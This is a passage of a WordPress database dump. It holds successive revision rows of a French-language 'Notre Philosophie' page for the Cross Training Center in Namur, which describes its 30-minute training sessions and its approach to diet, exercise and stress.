(299, 1, '2013-07-04 19:10:38', '2013-07-04 19:10:38', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:10:38', '2013-07-04 19:10:38', '', 5, 'http://www.crosstrainingcenter.be/5-revision-45/', 0, 'revision', '', 0),
(301, 1, '2013-07-04 19:11:52', '2013-07-04 19:11:52', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;<br>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:11:52', '2013-07-04 19:11:52', '', 5, 'http://www.crosstrainingcenter.be/5-revision-47/', 0, 'revision', '', 0),
(300, 1, '2013-07-04 19:11:13', '2013-07-04 19:11:13', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;<br>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:11:13', '2013-07-04 19:11:13', '', 5, 'http://www.crosstrainingcenter.be/5-revision-46/', 0, 'revision', '', 0),
(302, 1, '2013-07-04 19:13:28', '2013-07-04 19:13:28', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:13:28', '2013-07-04 19:13:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-48/', 0, 'revision', '', 0),
(303, 1, '2013-07-04 19:14:58', '2013-07-04 19:14:58', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 100px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:14:58', '2013-07-04 19:14:58', '', 5, 'http://www.crosstrainingcenter.be/5-revision-49/', 0, 'revision', '', 0),
(304, 1, '2013-07-04 19:15:48', '2013-07-04 19:15:48', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 20px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:15:48', '2013-07-04 19:15:48', '', 5, 'http://www.crosstrainingcenter.be/5-revision-50/', 0, 'revision', '', 0),
(305, 1, '2013-07-04 19:16:05', '2013-07-04 19:16:05', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 900px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:05', '2013-07-04 19:16:05', '', 5, 'http://www.crosstrainingcenter.be/5-revision-51/', 0, 'revision', '', 0),
(306, 1, '2013-07-04 19:16:23', '2013-07-04 19:16:23', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:23', '2013-07-04 19:16:23', '', 5, 'http://www.crosstrainingcenter.be/5-revision-52/', 0, 'revision', '', 0),
(307, 1, '2013-07-04 19:16:45', '2013-07-04 19:16:45', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:45', '2013-07-04 19:16:45', '', 5, 'http://www.crosstrainingcenter.be/5-revision-53/', 0, 'revision', '', 0),
(308, 1, '2013-07-04 19:17:07', '2013-07-04 19:17:07', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 350px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux 